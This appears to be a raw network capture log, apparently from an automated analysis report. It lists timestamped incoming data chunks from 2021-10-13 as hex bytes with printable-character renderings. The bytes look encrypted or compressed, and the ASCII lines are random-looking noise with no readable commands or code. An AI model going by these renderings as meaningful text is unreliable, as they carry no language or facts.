                                                        2021-10-13 12:39:36 UTC34INData Raw: b4 55 5d 63 93 91 6e 19 83 cf 71 6a 55 19 58 6a 33 06 82 63 5f 28 78 45 85 34 04 80 e8 75 a3 bd 7c a6 71 82 15 18 8f 5c 83 17 90 46 19 76 17 91 ed 64 cb 65 cb 04 75 73 7e 30 11 8c af 43 f3 d7 07 69 24 af 03 74 9f 8e 0c e2 8b 3d b5 8d bb 26 9d da f4 30 88 c9 dc 56 e4 60 47 5a ad ff e2 38 94 fd 60 28 7f 3c 21 e8 cc 25 90 d2 dc 9d 1d 46 71 e9 86 60 f8 48 b0 60 b6 19 68 ad 06 6b 6e 31 74 f2 7f d7 25 33 c6 c9 70 46 c4 83 20 1a 47 51 af 0c 40 42 c4 ae f0 4e d9 c4 fa 1e 64 51 9a 73 ed d5 f7 3c d4 be ae 66 78 7f cd fd 7d fc 24 55 28 da af a4 d7 38 dc 53 5f 15 e4 19 e8 14 2f 24 c5 07 5d 3f 1b 25 69 4a 50 99 26 20 4a 51 d1 e9 a7 43 69 7c a8 bc 88 68 df c3 70 09 8c d1 c7 0d 01 65 3e 90 6c 5c bf cb 3e 15 95 d7 09 7d 50 86 21 53 6b e6 eb e2 f9 f6 a0 a7 3a 25 ba ee f1
                                                        Data Ascii: U]cnqjUXj3c_(xE4u|q\Fvdeus~0Ci$t=&0V`GZ8`(<!%Fq`H`hkn1t%3pF GQ@BNdQs<fx}$U(8S_/$]?%iJP& JQCi|hpe>l\>}P!Sk:%
                                                        2021-10-13 12:39:36 UTC35INData Raw: 9a d6 b0 e7 51 33 e4 ba ef ff dc 3c 14 76 78 e8 fe 0e 8c d3 bb 15 8f 55 4a fd 0d 5e e2 48 04 0c 21 e4 e9 22 83 8d 28 72 bc 8e 6b dc 37 d7 df ad bd b7 2b 78 04 dd 47 df 18 36 d4 1e 44 8a 11 9b ca c5 8f 9a ca d9 aa 06 23 56 c0 9d 54 99 1c 38 4a e6 c4 86 ae ac 31 ce d9 0a a9 1f 41 37 e9 5f e6 aa 71 19 81 ff 64 3e ce ed 20 d4 56 a2 43 d0 c3 86 9f fb dc 58 58 18 b4 7e 28 d7 77 ee 84 c9 8f 76 8a 2d 97 43 04 12 1d 8e 18 f6 99 c5 61 ed 58 2d 5e 40 5c 1b 42 c9 d4 53 25 d8 26 2b cf 0b 86 3e 3b 1b c6 e1 36 ce 56 25 2b ad f5 c9 35 bd 59 b1 84 06 96 d7 f7 06 dd 32 80 ac 83 90 2f 3e 06 0e d0 56 79 de 2a 0c d1 28 97 4e 3f 97 a7 df d7 56 dc 98 b5 16 a0 03 da 42 4b 1d b3 d4 c7 b5 34 04 b6 7d 40 3b 99 9d cd 1f 5a fe c0 aa d8 68 1a ef dd 78 74 4c 9a 80 6d 29 cb e2 70 60 30
                                                        Data Ascii: Q3<vxUJ^H!"(rk7+xG6D#VT8J1A7_qd> VCXX~(wv-CaX-^@\BS%&+>;6V%+5Y2/>Vy*(N?VBK4}@;ZhxtLm)p`0
                                                        2021-10-13 12:39:36 UTC36INData Raw: 04 e6 f9 52 cc 1f c8 23 76 7c ed a9 71 c1 a5 92 18 1d 6a 0e 5b 42 97 f2 78 70 58 d3 a1 2d 96 51 d3 74 ec a2 cb 15 3a 90 b6 45 ab d6 d2 30 c8 3f 6a 3d f4 4b 68 8b 13 a9 a6 db 40 96 84 ef 26 b5 62 7c de 18 b9 57 2a d2 4d 78 79 72 0a fb fb 38 d5 bc cf 49 f3 dc 4d 3a a9 7b 97 ea d0 b8 a0 c0 d5 dd 5c 06 6a a1 9c d2 ab 5f a2 86 81 75 bf 6e 36 49 5d e3 e8 be f0 04 1d 40 cf 02 6a 0d 70 71 fe bf da 62 bb bf a9 92 b9 43 e1 d1 87 25 aa 55 c3 df cb 95 9d 21 53 4a e1 74 4b 13 23 ce 0b 5e 14 b1 9a b0 b9 df ea e7 e0 31 03 ae 16 2f 31 03 3f 59 8b aa 89 76 6f 58 ac 10 7e dd 92 16 99 c1 35 2d a4 6b ba 7b 41 b5 08 7c 4d c2 6b 05 d7 6d 41 cb 99 39 c4 14 9e 5b 71 43 f5 6f 3a d3 28 ca cb d2 76 07 29 aa 7f 85 fb 7a 95 dc 22 5f fd 71 9d de 85 8e d4 17 ae cc 9a cf ec ff d8 14 0e
                                                        Data Ascii: R#v|qj[BxpX-Qt:E0?j=Kh@&b|W*Mxyr8IM:{\j_un6I]@jpqbC%U!SJtK#^1/1?YvoX~5-k{A|MkmA9[qCo:(v)z"_q
                                                        2021-10-13 12:39:36 UTC38INData Raw: 91 e1 5d 01 4d 2b 0c 1a 4b 10 60 1b 8a 8d 10 f8 c0 6e 5b 44 af 09 61 bf e5 45 e2 8d 1f 18 c6 bb 2c f8 f5 fd 5f 7b cf f4 c3 f5 66 69 15 ce ff e4 30 b2 58 0d 77 78 14 e9 87 ac 2e ff e6 ce 89 3c 09 48 5c eb a6 fe 36 da 48 17 1d 40 05 17 67 79 1f b1 e4 78 53 fd 62 69 c9 7a 4a e4 d6 2f 14 44 3e c3 63 21 47 ec 08 da 2c de ec 32 0d 6e 73 69 4d ec df ec 30 93 86 ac 66 74 12 a6 ec 7b e9 07 e5 3b d1 27 3b 7a 96 dc 59 3a 3a f1 76 29 12 40 af e9 a9 89 46 88 30 1c 7b 43 9e 0c 6f 54 47 ed 1f 9d 43 63 71 c1 e3 e7 49 d4 1f 6b 02 82 ef ef 83 b6 00 bd 92 47 1f 9e d1 8e 15 93 c2 1f 68 44 87 ac ea 79 ff b2 f2 fd ef a4 99 b5 2d 91 cd e9 1c b5 a1 48 fe d7 05 03 84 45 95 e9 46 a2 89 e2 91 c5 d7 7e 7d 5d bb 9a 86 ce 08 43 87 bf 66 68 21 db 04 e9 f5 7a de 3b c1 23 47 71 62 1e 43
                                                        Data Ascii: ]M+K`n[DaE,_{fi0Xwx.<H\6H@gyxSbizJ/D>c!G,2nsiM0ft{;';zY::v)@F0{CoTGCcqIkGhDy-HEF~}]Cfh!z;#GqbC
                                                        2021-10-13 12:39:36 UTC39INData Raw: d6 ff a4 2f 57 38 ca 30 9a df 36 de 07 35 34 14 8a cd a6 a2 99 c2 bc 31 02 3b 33 fa f3 df 92 0d 37 3d 05 eb 87 a4 8e 2d e5 b0 0d 81 32 52 33 f2 35 59 85 70 13 9a e8 0c e4 c9 fc 2e ef 8f 78 e0 76 a8 c3 a5 fb d6 52 aa 0e b4 7f 32 8b 76 ee 8f af b7 1e 8b 27 41 41 cf 3d 3c 95 1e ff fc 9f 77 60 47 f1 56 46 38 28 7b c9 de 73 fb df 21 58 18 0b 84 34 2f 1c f6 b9 36 c1 4a 25 2b af f7 cf 3b df 6b d9 92 0c 96 d7 f7 06 c6 04 84 d6 84 90 3a 24 4b 0e d1 54 5d d6 59 3c d1 28 9d 15 4c f2 b7 c9 ce 5e ed d0 bc 12 cf 18 ca 47 56 8c 2f f8 c4 a7 48 27 b7 6c 4f 33 61 ef cb 15 58 dc fc af c9 67 27 e5 ae 40 70 4c 81 94 77 3e 5a ce 5d 6b 2c 09 4d 6a 39 0c aa 54 06 3b 7d 4f e0 02 18 7e e8 4a a0 ae 5c 03 40 81 1f 0d 8d 69 b4 12 90 5d 73 98 e9 90 cb 61 c5 4f 03 66 76 75 17 48 35 8c
                                                        Data Ascii: /W806541;37=-2R35Yp.xvR2v'AA=<w`GVF8({s!X4/6J%+;k:$KT]Y<(L^GV/H'lO3aXg'@pLw>Z]k,Mj9T;}O~J\@i]saOfvuH5
                                                        2021-10-13 12:39:36 UTC40INData Raw: 12 6a 2c f3 53 be 8a 3f ac a2 8d 5a 9f f7 ef 39 a8 7d 77 21 1b 95 7a 22 ab c5 79 6f 72 22 ef fa 38 df 44 bd 44 2f d6 65 bd a9 7b 96 ee ec ac a7 2e c4 da 40 a2 6b 8d 84 b3 eb d2 89 82 8c 69 bf 61 27 50 4c ef 8a ae d4 06 03 fc de 0b 72 1b c4 74 f7 a6 c6 d6 d8 b6 b3 8e 08 8f f2 d9 96 b9 aa 5a c0 c0 a9 85 b9 3a 6e b6 ef 76 46 02 bf ce 04 5e 13 59 07 8d 89 d1 e6 f4 7b ac 1b b1 1d 3b c2 64 36 52 83 9b f9 61 70 5e a1 21 7a fb 89 10 3c 7c 53 2d 7e 7c 6e 87 7a b5 08 7f 52 c5 66 0f a4 2d 43 45 2a a2 a4 68 b6 47 76 5c f0 0f aa d2 39 cb ce 2a 68 3b a7 96 6c 82 fa 78 97 cb a3 16 ed 58 11 42 5a a1 6a fe 87 be cf ba ed fe df 34 7e 88 cf fd ee d4 9d d6 b6 3a 9b 7d 2c fc 0d 54 a7 5e 0d 0b 3d 61 2d 57 87 03 95 a4 e7 f7 6b dc 37 f2 41 d6 f5 bd 3a 7a 14 dc 20 fc 08 33 b1 95
                                                        Data Ascii: j,S?Z9}w!z"yor"8DD/e{.@kia'PLrtZ:nvF^Y{;d6Rap^!z<|S-~|nzRf-CE*hGv\9*h;lxXBZj4~:},T^=a-Wk7A:z 3
                                                        2021-10-13 12:39:36 UTC41INData Raw: f8 16 9a f6 15 77 7e 3d 2b 87 9c 24 8c 94 cf 87 2c 0f 60 fc f2 96 f0 48 f7 4d 17 19 37 a7 15 76 0c 88 73 e4 72 53 94 74 ac c9 70 4a a3 58 2c 14 48 68 35 62 21 49 ab 33 d9 2c d2 d7 f5 1c 6b 6d 2e 1d ee df e0 20 36 24 ae 66 73 78 d2 f8 53 45 2f 43 33 f9 30 13 b8 9c d1 42 50 10 d8 19 20 14 29 38 65 ae 83 29 0b 25 08 65 78 31 27 0c 4c 68 d4 9c 9c 49 7a 79 ce f7 04 57 d5 1f 60 19 a3 5f c1 83 bc 26 8e 81 68 4e 1b c6 3d 15 92 d2 24 f4 54 83 28 71 61 1e c1 e3 f9 fe 85 9b a6 25 b0 f7 ff 3e a8 79 98 ed d1 16 2d 97 6d b1 e3 55 af 8c f4 88 be 8a 4e 7d 57 a2 bf 99 cd 05 59 87 bf b4 68 21 db 99 de e2 ac cc 20 d6 3a 50 50 b6 a9 71 e3 a7 bd 1f 11 49 a1 ca 46 9d cb 20 86 ab 5f 24 3f 91 5b d1 79 e0 56 d8 10 1b e9 8c 8e ad fe 48 2f db 32 7b 05 db 23 95 8a 39 c3 39 d6 5a 8f
                                                        Data Ascii: w~=+$,`HM7vsrStpJX,Hh5b!I3,km. 6$fsxSE/C30BP )8e)%ex1'LhIzyW`_&hN=$T(qa%>y-mUN}WYh! :PPqIF _$?[yVH/2{#99Z
                                                        2021-10-13 12:39:36 UTC43INData Raw: 7e 59 89 83 1f 33 89 ec 65 29 d8 dd 4b da 46 a6 c7 b9 a3 93 b6 cc d6 53 8c 11 82 53 7f b0 76 e4 50 c0 f1 0d 9c fb 8e 8c cb 0b 05 89 20 8a 0b 6d 9e fc 59 e6 80 54 38 11 48 d8 f4 47 a4 24 d8 c8 11 04 a1 16 32 1b dc b3 25 e8 7e 1d 2b ad fd 17 3b bb 29 de ae 0c 96 d7 b6 32 c6 02 84 ac 04 90 b1 3c 4b 0e bd 45 6d d5 52 6d d0 28 92 42 4c f2 bc df dd 5a d5 90 bd 12 de 18 db 42 68 77 2e d4 fd ba 5b 22 b8 7d 4a 28 85 ee e7 1f 49 c4 d4 af df 6e 0b e9 d2 53 75 5d 86 82 62 09 a2 cc 71 60 3a 95 52 75 30 f3 81 67 1b 39 7e 67 57 06 04 8a fa 63 b4 a6 67 84 41 90 1f 04 77 75 8b 01 99 44 5e 90 17 91 ed 1a 67 4c 2b 0c 5d 64 11 60 1b 9f a1 49 e8 ca 68 34 2e b3 f7 64 bb e5 57 e6 a3 6d da c6 b1 63 9a cb fc 5f 57 c9 dc 5c 2c 66 6f 6b a2 ff e4 34 5a f9 0f 77 d8 3d 2b 87 8a 26 90
                                                        Data Ascii: ~Y3e)KFSSvP mYT8HG$2%~+;)2<KEmRm(BLZBhw.["}J(InSu]bq`:Ru0g9~gWcgAwuD^gL+]d`Ih4.dWmc_W\,fok4Zw=+&
                                                        2021-10-13 12:39:36 UTC44INData Raw: a5 c0 c2 d6 47 d0 ca 8d 95 a6 cf d4 a1 82 8a 7f 84 c4 37 58 50 ea 10 a9 cf 14 3e 4a de 05 7b 08 c2 68 f6 97 5c 49 c9 b8 c6 3a 94 9e f0 ee 91 2c 93 df df d6 33 fb b1 26 78 20 d3 7a 51 18 08 d1 1d 44 0d 99 88 99 90 cb fd e4 69 0a 21 60 1e 05 1c 76 3e 5f a9 0c fd 77 69 7a 3c 3d 7b fd 89 cc a7 ee 64 0a a4 6b b2 19 55 c6 b7 7e 5e cd 73 28 94 3b 41 c1 43 bd ad 98 9f 4b 77 5c fa 7c 3d d3 4c b8 dd 39 6d 2b 2a bc 77 b2 ff 6b 1b c2 2d a1 9f 5d 9f e4 9f aa 98 b7 51 33 ee 92 62 fc d2 3a 5e 22 78 e2 f4 03 85 fb 19 25 8b 53 3b 8e b2 5e af 42 0e 1a 5a 38 9a 46 88 9e 2d 68 dc e5 52 91 3c da dd c7 fa a6 25 e6 04 df 25 f1 31 07 de 0d 4b b6 11 b2 fe ab a4 9b db d7 c8 8e 3a 39 eb 8f 53 4d 1f 18 7a be ea 87 a4 b5 3a ce 88 0b a9 1f 8f 26 f9 5a 89 94 77 31 e6 ef 63 29 a6 7b 25
                                                        Data Ascii: G7XP>J{h\I:,3&x zQDi!`v>_wiz<={dkU~^s(;ACKw\|=L9m+*wk-]Q3b:^"x%S;^BZ8F-hR<%%1K:9SMz:&Zw1c){%
                                                        2021-10-13 12:39:36 UTC45INData Raw: 14 48 2f 2c 62 21 49 ec 12 d8 2c de d7 f7 73 f6 79 06 79 fe d9 98 ae bb 23 a4 75 78 12 5e ec 7b e7 3c 4b 2f c0 28 7c 30 97 dc 55 42 de e3 65 30 18 17 d5 e8 a9 83 38 03 20 10 59 c7 9a 27 0a 29 ca c4 9c 9a 6b f1 7e c7 ed 9e 40 fb 1f 61 05 9d 87 16 83 b6 0a 81 99 7d 5a bf 60 3e 15 95 ab 86 6d 55 85 31 5b 7e c7 99 ef d1 66 ae 8f a0 4a 30 e5 f8 13 b7 a3 c3 e4 c0 18 2d 18 6e b1 ef 29 22 9b e7 86 e8 47 4f 7d 5b a2 be 9e d7 19 b5 8f 86 df 16 b9 dd 15 eb f4 84 e3 33 d0 21 40 86 ed c9 5d cc a0 94 34 36 6a 37 5b 42 97 da 38 9e ab 04 d9 3d 91 57 ad f9 f0 5c cc 56 ae 99 8f 84 ba d1 fa 99 db 38 6c 3f fb 43 90 a2 ad ad a2 dd 77 c6 92 e5 1f 20 7c 77 2a 34 af 5f 2a de 7e 0a 5b 70 22 e9 e9 35 ce 99 ac 4e 9c fe 76 a7 af 6a 9a e4 d6 c4 83 c2 c4 dc 51 f5 7a 85 fa 8a e5 5f a4
                                                        Data Ascii: H/,b!I,syy#ux^{<K/(|0UBe08 Y')k~@a}Z`>mU1[~fJ0-n)"GO}[3!@]46j7[B8=W\V8l?Cw |w*4_*~[p"5NvjQz_
                                                        2021-10-13 12:39:36 UTC47INData Raw: 98 73 ef 7a 36 56 47 35 0d 63 3d df 79 25 ab 21 36 cf 01 97 39 2d be df b9 30 d3 5b 37 26 85 50 ca 3b bb 10 d5 96 00 be f9 f5 06 c0 11 8f be 0f 81 28 2f 4c 61 d8 46 6d df 4b 6a f8 ef 9d 42 4a e1 ae d9 f5 02 d7 90 bb 7d e7 1a db 44 47 63 29 bb 11 bf 5b 28 d8 59 48 28 99 e8 cf 82 5a f4 d9 be cf 02 dd e9 b2 59 5d 25 91 91 62 5e bf ce 71 6a 55 a2 5a 6a 3f 0b a8 e3 15 28 7e 20 db 05 04 86 ef 6d 75 b9 51 a6 76 81 15 14 9a 7d d4 35 92 4c 70 8a 3f a9 e7 75 c9 93 2b 01 5f 74 01 60 11 8c a5 54 fb 33 91 25 31 b5 09 65 96 bd 76 e1 8b 6b da c6 bb 78 97 cb ed 2c ce c9 dc 56 fd 60 11 47 af ff e0 1c 8d fa 0f 71 56 68 28 87 aa 0c 88 da cf 8f 59 c5 60 fd e3 78 f6 6d 92 7f 17 19 62 ab 3d 5f 7f 37 79 3a 78 5f ec 70 69 c9 74 64 db 90 2c 12 6a 14 a0 63 27 6b dd a6 d8 2a b7 0e
                                                        Data Ascii: sz6VG5c=y%!69-0[7&P;(/LaFmKjBJ}DGc)[(YH(ZY]%b^qjUZj?(~ muQv}5Lp?u+_t`T3%1evkx,V`GqVh(Y`xmb=_7y:x_pitd,jc'k*
                                                        2021-10-13 12:39:36 UTC48INData Raw: 2f ac 3d 57 d7 35 9e de ab 79 2a f4 6d 5d 1c 32 da 24 e1 1a 4f 91 b4 2a cd ec e4 cf 1d 13 ae 1c 05 ff 75 3e 53 8a 85 d6 46 6f 52 83 04 ad fb 83 12 b5 b8 c1 3c a4 6d ab 0c 8f a1 2d 56 69 c7 79 0a bf 3c 47 c6 b5 85 ab b2 94 86 51 5e fa 7c 2c d5 11 61 de 2c 71 44 ad bc 6c 84 d6 69 94 e9 3b b0 fa 32 17 f4 80 b0 a7 33 42 25 f7 b2 d5 73 d2 3c 76 17 7e f3 f6 19 e3 5a a1 25 8d 46 39 ec 0b 4f a7 52 6b 94 34 ef 9c 55 89 9c 24 6f c7 f2 05 55 3c da db c5 ff a6 22 54 85 da 34 ff 34 7e cf 06 69 09 15 8a c6 87 9b 8a c0 fb 29 02 3b 33 c0 aa 27 b1 0f 3d 54 9a e6 96 a2 b7 3b 89 98 09 a9 13 43 3f e9 51 e6 a1 72 19 8d fd 6f 3e c3 93 02 c0 47 a0 dc 6b 84 1b 9d fb d0 3c ac 00 a5 7d 41 a1 7a 81 96 c1 e0 14 55 22 b8 b7 ed 18 14 a8 0d f2 de aa 61 ed 58 2f 56 56 3b 17 95 da d6 68
                                                        Data Ascii: /=W5y*m]2$O*u>SFoR<m-Viy<GQ^|,a,qDli;23B%s<v~Z%F9ORk4U$oU<"T44~i);3'=T;C?Qro>Gk<}AzU"aX/VV;h
                                                        2021-10-13 12:39:36 UTC49INData Raw: 0d 16 2f 28 87 d4 83 29 00 5e 3a 73 50 9f 35 1b 6e 85 c4 9c 96 79 18 82 38 14 56 66 c7 08 9f 19 97 c7 c0 98 d9 5d 90 90 66 8a 86 f6 2a c3 80 cb 1d 63 44 95 1c 1d 90 31 77 e5 96 3a ac 8f ac 4a 7d e5 f8 1f b7 b1 f9 b3 c3 0c 2d 4b 6c b1 e3 55 bb 8b f4 ef e5 fd 4f 7b 32 7c b6 8f d5 1a 7a c8 e4 f5 6a 21 db 06 f5 f3 b8 dc 20 bf 0c 54 78 ea c6 59 eb b1 95 09 03 53 6f 35 61 9f cb 37 e0 83 2e bd 38 80 45 d3 60 9e 79 c8 39 35 f6 a9 8c ab d0 c3 3a f3 85 69 2c f5 3d bc 88 3f aa b3 d3 4b 91 ec f7 36 b2 77 65 38 31 5c 4f 22 f8 65 e0 a7 7c 30 f7 04 2e c1 94 bd 53 9c 81 74 a7 a3 a7 86 f1 f6 ab a7 c1 ec da 40 fa 6b 71 95 01 4e 5e ac 82 8c 68 ac 6b 36 81 5b 5a 6a bd d2 11 15 60 cf 01 6a 94 5a 1d ee bc de 4a c9 be a9 83 a4 94 fa 8a 81 25 bb 38 dc d6 24 8b a1 aa 53 2a fe 7f
                                                        Data Ascii: /()^:sP5ny8Vf]f*cD1w:J}-KlUO{2|zj! TxYSo5a7.8E`y95:i,=?K6we81\O"e|0.St@kqN^hk6[Zj`jZJ%8$S*
                                                        2021-10-13 12:39:36 UTC50INData Raw: 2c d9 d7 f4 1c 6a 6f 11 ef fc db ce 9e bb 23 a4 77 76 7a 56 c0 5e e4 39 d9 11 c0 21 13 b2 46 e3 53 55 05 d8 62 23 14 25 06 d0 a8 83 23 73 0e 1c 71 51 e8 18 0c 46 41 3b 97 9f 43 1d 6f c7 eb 93 42 d5 1f 61 14 bb c4 c0 df b6 0a 90 ce 6c 56 86 8a 82 15 93 ce 06 6a 2b a8 23 5d 6b e6 9f e1 f9 fa 85 dd a5 25 bc cc e0 17 a4 af bd 27 d1 14 0f 5d 63 94 c1 71 a8 9a ed 8c e8 c7 4f 7d 57 6f b6 89 a1 26 4a 8e 93 ff 7f 23 dd 13 c9 b0 af cd 35 f8 32 54 78 ea c6 bb e9 b1 99 c6 19 67 54 6d 42 9d c1 3c a7 9f 2c bd 34 4f 51 c4 59 f0 40 ca 39 33 99 89 8e b7 f4 d2 20 c1 38 6a 2d f3 52 a6 8a 23 e0 a2 d9 40 85 83 ee 2c 82 74 77 c4 1b 95 4e 4e f2 48 68 0a cd 22 ef f0 32 a1 0c bd 48 f9 da 0a 3f a9 7b 9d e6 d9 d5 89 c1 c4 de 68 ef 69 8d 93 a1 ee 77 63 81 8c 6e 84 c9 36 58 50 d1 b7
                                                        Data Ascii: ,jo#wvzV^9!FSUb#%#sqQFA;CoBalVj+#]k%']cqO}Wo&J#52TxgTmB<,4OQY@93 8j-R#@,twNNHh"2H?{hiwcn6XP
                                                        2021-10-13 12:39:36 UTC51INData Raw: cf d6 6e f3 cf 0f e3 ce 0b 8e 16 dd 1a dc b3 57 e8 80 24 2b a7 df 1e 3a bd 09 f1 5d 0d 96 dd ff 11 10 1c d9 a0 15 9c 38 e8 58 02 c1 4b 7c c5 68 df c1 2f f2 8f 4c f2 ac c9 ee 59 0b e6 ce 30 cd 18 dd 51 4b 63 24 fc 17 bc 5b 24 d8 55 48 28 99 ff ed 0f 5d 9b f7 ad c9 6b 1a e3 a3 57 1a 6a 92 91 6e 20 ae e7 a0 63 3a 82 37 40 3b 0d 86 4d 07 22 17 57 f0 07 0e 91 e7 09 60 ac 74 84 7b 2c eb e1 76 aa b1 06 9e 39 4d 81 17 90 cb 79 d2 43 5e 3d 75 75 10 0f 46 8c a5 58 27 1e 7d 00 0c 98 09 65 9d b5 4b 91 34 37 da cc b0 0e af cb fc 55 af cb da 76 f0 4c 6f 6b ae be d0 34 9a fa 0f 77 7e 65 2b 87 ac 47 91 d8 cf 35 37 0f 60 eb e9 a6 f8 48 ba 48 17 19 68 a7 15 61 7f 37 73 2a 79 59 92 88 69 c9 70 59 cc 92 2c 0e 42 40 a2 70 11 46 c4 a5 d9 2c d8 aa f0 0d 7f 6f 15 76 d5 2d e6 36
                                                        Data Ascii: nW$+:]8XK|h/LY0QKc$[$UH(]kWjn c:7@;M"W`t{,v9MyC^=uuFX'}eK47UvLok4w~e+G57`HHha7s*yYipY,B@pF,ov-6
                                                        2021-10-13 12:39:36 UTC52INData Raw: 1d fe 7e 52 07 24 ac b3 41 1a 45 90 b4 b9 ce ec e8 39 bf 15 84 11 07 5e 34 72 59 81 82 fe 77 6f 3a 89 3d 7b 88 83 12 b2 10 4c 3d a4 67 b8 0a 51 af 08 7e 5f c5 79 00 ac 00 41 cb 9d 07 ab b2 9e ae 77 5c fa 6a 3d d3 39 cd dd 2c 77 2b 2a bd 6c 84 fb 6b 92 db 2c a1 fc 43 9e f5 80 a3 b0 e9 51 29 e4 ba ec e4 e2 3f 76 46 79 e2 fe 7f 8c d3 b1 56 34 55 30 f7 07 20 93 48 04 17 1d 36 99 46 84 9a 4d 43 cf eb 60 f1 3a dc d6 0b ea b6 2b 7c c9 cf 11 dd 2e 36 de 07 52 9f 12 81 e4 92 a4 9b c0 0e b2 02 3b 39 93 a0 54 93 07 15 8b 8a ea 81 b9 c9 0f e6 b0 01 a5 1d 3d 87 f9 5a 83 88 79 0a 85 fa 70 22 f1 3e 24 c2 47 b7 c3 76 a1 2c 8d fe a8 6f 86 02 af 53 9d b3 76 e8 9f c5 c8 3a 8b 2d 97 88 b5 25 14 a2 14 ec f0 ba 78 ec 52 fb 47 41 1b db 40 c9 d8 16 90 d9 27 3d bb 19 84 3e 1e 74
                                                        Data Ascii: ~R$AE9^4rYwo:={L=gQ~_yAw\j=9,w+*lk,CQ)?vFyV4U0 H6FMC`:+|.6R;9T=Zyp">$Gv,oSv:-%xRGA@'=>t
                                                        2021-10-13 12:39:36 UTC54INData Raw: 34 39 51 99 2d 1a dc 68 e2 9c 9c 49 06 55 c5 eb 8e 79 d0 37 88 0c 8b c1 af 21 b6 0a 9a bc 49 47 91 e8 38 3d 7a c7 0c 6a 40 95 0a 15 6e ce 82 f4 63 d4 47 8c a6 23 af f2 d0 5d a5 a9 d8 fb 4b 7b 21 81 6d b7 f8 43 80 71 e4 80 c6 90 ed 7d 5d bb 9a be ce 0b 5a 8b bf 3c 6b 21 db 00 f7 ca e4 cc 33 da 3c cc 50 00 aa 71 ef a4 85 30 5f 43 7c 50 54 07 e3 32 8e a7 2a 95 9f 91 51 c8 1c d7 5e ca 3f 18 aa 9e 8b 83 3b d1 2e dd 57 c8 2c f3 58 ba af 2e aa b3 d2 72 68 80 ef 31 a7 6b 5f 68 18 95 44 35 68 60 95 7a 72 24 fa ec 10 97 95 bd 42 e5 4c 1b 81 ab 7b 91 e4 da 83 49 c3 c4 dc 2f d2 69 8d 93 aa f6 59 cd 9a 8d 68 a6 78 3c 37 91 f9 16 b5 e6 da eb 9f 30 dd 7c 1c 52 10 c4 bf d0 4b e5 b2 b8 92 e1 a5 fa c2 81 4a ec 52 dc dc e9 85 b9 30 ae 39 f6 6f 50 05 2a 51 bb 7e 60 b1 64 63
                                                        Data Ascii: 49Q-hIUy7!IG8=zj@ncG#]K{!mCq}]Z<k!3<Pq0_C|PT2*Q^?;.W,X.rh1k_hD5h`zr$BL{I/iYhx<70|RKJR09oP*Q~`dc
                                                        2021-10-13 12:39:36 UTC55INData Raw: 7b 96 d1 04 90 53 44 e3 a0 b0 f9 59 d5 96 a2 31 dc 0a db 53 53 6d 33 2a c6 93 51 33 bd 6a d0 3b 99 f1 f9 0d 48 f4 c2 bd d6 75 f5 e8 9e 5e 64 40 b8 75 68 31 a2 dc 74 7f 23 97 4a 6a 28 1f 98 b5 17 04 61 67 ef 04 04 86 c1 45 ab ac 7e a6 41 85 15 18 a1 50 a7 17 9a 5f 72 98 04 83 e7 64 d1 52 0b f8 74 59 1a 13 33 8e a5 54 e8 c8 77 04 37 bd 09 74 85 b9 67 1c 8a 1b d6 d7 b3 2e f8 e3 fe 5f 77 d6 fe 4f e5 66 7e 79 b1 ef 1a 35 b6 f3 1e 66 6f 2c b1 94 a7 3b 81 cb dd 89 27 1d 7f de 17 a7 d4 45 ab 40 06 1c 07 81 17 67 79 28 57 f7 6a 59 83 4e 77 df 8e 4d e0 98 3d 1e 55 da b0 6f 3e 54 d7 b6 d8 3d ca dd 0e 0c 42 70 75 cc ed df ec 3c a1 30 bc 66 63 7e da 12 7a c1 25 3d a1 d1 21 19 ab 93 c1 40 47 04 e1 64 3c 1f d1 2f c4 a2 92 27 1b 3c 86 62 57 86 2b 1f 54 40 d4 8e 83 5c 97
                                                        Data Ascii: {SDY1SSm3*Q3j;Hu^d@uh1t#Jj(agE~AP_rdRtY3Tw7tg._wOf~y5fo,;'E@gy(WjYNwM=Uo>T=Bpu<0fc~z%=!@Gd</'<bW+T@\
                                                        2021-10-13 12:39:36 UTC56INData Raw: 28 4a f7 81 4f cd 16 22 ad 3b 4b dc 10 fc ab b2 9f 48 62 4d ef 6a 22 de a4 dc c8 43 2a 2b 2a b7 7f 89 ed 7a 99 4d 9a b9 26 4e 88 e6 90 8e 6a e9 51 33 f5 b1 fc ef 48 14 7f 02 78 e4 91 0e 8d d3 aa 34 80 44 20 67 25 54 ab 48 02 72 d3 ee 9a 4c 94 73 20 21 e3 f3 7b d7 2c ca 47 c0 e4 bc 3a 6c 8d b4 f9 f5 19 3c c6 d7 2e 68 14 8a c6 a6 b5 90 db c3 21 2b 30 3d ed 9a 3b 93 0c 3d 58 98 e1 96 be b1 e4 7c 98 07 ad 15 54 5c f8 5b 89 8f 2f 35 fe fd 68 3e d9 66 32 d3 4c b7 dd fd c3 7b 9e fb dc 44 5c 6d 56 7b 47 ba 65 eb 9f cb f1 0e 9c fb 07 89 cb 13 05 b2 09 29 6c fd ac ed 52 fb 4e 9d 5c f3 43 c9 d4 6a 23 ab 05 35 cf 0d 97 2f 14 1e b3 74 36 c0 5c 3f 1a 83 e6 d8 33 d2 2b db 84 0a 87 c6 e6 00 a9 26 86 ac 02 81 3e 2f 4e 61 f6 45 6d d3 48 79 f8 25 99 42 4a 9d 8c dd dd 5d d3
                                                        Data Ascii: (JO";KHbMj"C*+*zM&NjQ3Hx4D g%THrLs !{,G:l<.h!+0=;=X|T\[/5h>f2L{D\mV{Ge)lRN\Cj#5/t6\?3+&>/NaEmHy%BJ]
                                                        2021-10-13 12:39:36 UTC57INData Raw: e4 d3 fc ad 8e b6 25 ba e4 f8 13 a4 4e 3f ed c4 0e 05 83 6c aa d9 42 a8 b3 e6 80 c0 89 4f 7d 4c c2 09 8f df 07 41 a6 2c d5 68 27 f5 d9 e1 e2 a6 e5 28 d4 2b 50 50 57 ab 71 ef 99 5f 18 17 48 54 46 46 9d cd 19 ab a7 2c b7 28 b9 bb c3 73 fb 74 ed 39 33 93 9c 8b ba d3 fa 1f db 38 60 01 f8 21 29 8a 3f a6 a9 0a 87 85 83 ef 26 b7 55 2b 20 19 93 43 2b da ac 7a 79 74 0a 0a f9 38 d9 bc e0 48 f3 d0 67 a3 a0 53 70 f6 dc ad 8f 28 c7 da 46 d0 36 8d 95 aa f4 59 ab aa 65 6b ac 6f 1e b2 59 f9 10 97 81 11 15 66 dc 0b 63 25 45 61 ff b9 f8 54 cd be af b0 c9 9e fa c4 93 22 b2 7a c3 d2 35 92 99 07 7c 2a f8 56 05 14 23 d9 00 50 12 67 b5 9e 81 c8 fa ca c9 bd 13 a4 00 03 0d 06 1c 5b 81 84 ed 7e 7e 5b 98 39 53 1d 80 12 b4 da 4a 15 83 6b b8 00 3e 9d 0a 7e 58 d6 